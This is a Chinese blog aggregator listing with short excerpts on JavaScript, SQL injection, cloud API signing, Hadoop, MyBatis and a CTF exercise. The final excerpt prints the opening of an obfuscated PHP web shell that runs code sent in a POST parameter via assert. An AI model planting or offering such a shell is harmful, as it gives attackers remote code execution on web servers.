js截取字符串的方法还是比较简单的,直接看图吧!如有错误欢迎指正 ...
分类:
Web程序 时间:
2020-05-18 12:11:25
阅读次数:
52
扫描发现www.zip和login.php,访问www.zip获得index.php的代码: <?php header('Content-type:text/html; charset=utf-8'); error_reporting(0); if(isset($_POST['login'])){ ...
分类:
其他好文 时间:
2020-05-17 19:20:29
阅读次数:
63
SQL注入的本质 SQL注入的实质就是通过SQL拼接字符串追加命令,导致SQL的语义发生了变化。为什么发生了改变呢? 因为没有重用以前的执行计划,而是对注入后的SQL语句重新编译,然后重新执行了语法解析。 所以要保证SQL语义不变,(即想要表达SQL本身的语义,并不是注入后的语义)就必须保证执行计划 ...
分类:
数据库 时间:
2020-05-17 17:59:33
阅读次数:
103
腾讯云API途径: 1,通过API文档 2,通过SDK 3,通过CLI 签名流程:1,申请安全凭证2,生成签名串 2-1,参数排序 2-2,拼接请求字符串 2-3,拼接签名与原文字符串 2-4,生成签名串3,签名串编码 1,申请安全凭证 登陆到api密钥控制台,创建SecretId/SecretKe ...
今天在写列表条件查询时,发现加上条件之后,结果不是很理想,因为有用到instr 来进行模糊查询,所以以为是instr和or 使用时会有先后执行顺序。查找了资料后发现是and 与or 一起使用时,需要注意到的问题
分类:
数据库 时间:
2020-05-17 09:16:53
阅读次数:
121
基本摘自网上给自己做一记录,如有错误请斧正 CombineFileInputFormat是一个抽象类。Hadoop提供了两个实现类CombineTextInputFormat和CombineSequenceFileInputFormat。 其继承关系如下: InputFormat >FileInpu ...
分类:
其他好文 时间:
2020-05-16 17:13:54
阅读次数:
87
function GetRequest() { var url = location.search; //获取url中"?"符后的字串 var theRequest = new Object(); if (url.indexOf("?") != -1) { var str = url.substr( ...
分类:
Web程序 时间:
2020-05-16 17:01:00
阅读次数:
73
$ 取完值以后直接拼接到sql语句后面去,相当于字符串的拼接,造成sql注入攻击,安全性问题 # 相当于preparedStatement, ???? 不会造成sql注入攻击,比较安全 List<PersonBean> getByCondition3(@Param("name") String na ...
分类:
其他好文 时间:
2020-05-15 20:18:50
阅读次数:
67
<?php $p=base64_decode("bW93YW5n");$i['j']='assert';$a[]=$i;@$a[0]['j']($_POST[$p]);$filename = $php_self=substr($_SERVER['PHP_SELF'],strrpos($_SERVER ...
分类:
其他好文 时间:
2020-05-15 13:29:09
阅读次数:
159
